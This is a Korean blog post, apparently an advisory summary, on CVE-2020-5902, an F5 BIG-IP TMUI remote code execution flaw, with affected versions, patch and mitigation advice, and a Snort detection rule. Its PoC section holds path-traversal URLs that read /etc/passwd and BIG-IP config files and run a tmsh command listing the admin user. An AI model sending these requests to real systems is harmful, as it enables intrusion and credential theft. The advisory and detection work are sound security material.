티스토리 뷰
[CVE 취약점] F5사 BIG-IP 제품군의 원격코드실행 취약점(CVE-2020-5902)
참조
> https://github.com/yassineaboukir/CVE-2020-5902
> https://www.youtube.com/watch?v=z8zyrVlKK-Q
> https://support.f5.com/csp/article/K52145254
> https://www.boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35498
Poc
Proof of concept https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf https:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin |
개요
F5는 BIG-IP에서 발생하는 취약점을 해결한 보안 업데이트 발표
공격자는 해당 취약점을 악용하여 원격코드실행 등의 피해를 발생시킬 수 있으므로, 최신 버전으로 업데이트 권고
※ F5 : 응용 서비스 및 네트워크 관리 제품 개발을 전문으로 하는 다국적 기업
BIG-IP : 네트워크 및 보안 관리 기능을 제공하는 어플라이언스 제품
BIG-IP의 Traffic Management User Interface(TMUI)에서 접근통제가 미흡하여 발생하는 원격코드실행 취약점(CVE-2020-5902)
영향 받는 제품 버전
BIG-IP(LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM)
버전 종류 영향 받는 버전 최신 버전(해결 버전)
15.x 15.1.0 15.1.0.4
14.x 14.1.0 - 14.1.2 14.1.2.6
13.x 13.1.0 - 13.1.3 13.1.3.4
12.x 12.1.0 - 12.1.5 12.1.5.2
11.x 11.6.1 - 11.6.5 11.6.5.2
방안
최신버전으로 업데이트 수행
보안 설정 적용
- httpd에 대한 LocationMatch 설정
- Self IPs 설정
- 관리 인터페이스 보안 설정
※ 참고 사이트의 ‘Mitigation’ 항목 확인하여 조치
Snort
alert tcp any any -> any any (sid:1; gid:1; flow:established,to_server; uricontent:"/tmui/login.jsp/..|3b|/tmui/"; nocase; msg:"BIG IP_RCE_CVE-2020-5902";) |
'CVE 취약점' 카테고리의 다른 글
| [CVE 취약점] Apache Struts 2 취약점(CVE-2019-0230) (0) | 2020.11.04 |
|---|---|
| [CVE 취약점] vBulletin 원격 코드 실행 취약점 우회 취약점(CVE-2020-17496) (0) | 2020.11.03 |
| [CVE 취약점] Apache Tomcat AJP 원격코드 실행 취약점(CVE-2020-1938) (0) | 2020.11.02 |
| [CVE 취약점] Apache Tomcat 서비스 거부 취약점(CVE-2020-11996) (0) | 2020.11.02 |
| [CVE 취약점] Apache Tomecat RCE 취약점(CVE-2020-9484) (0) | 2020.11.01 |
- Total
- Today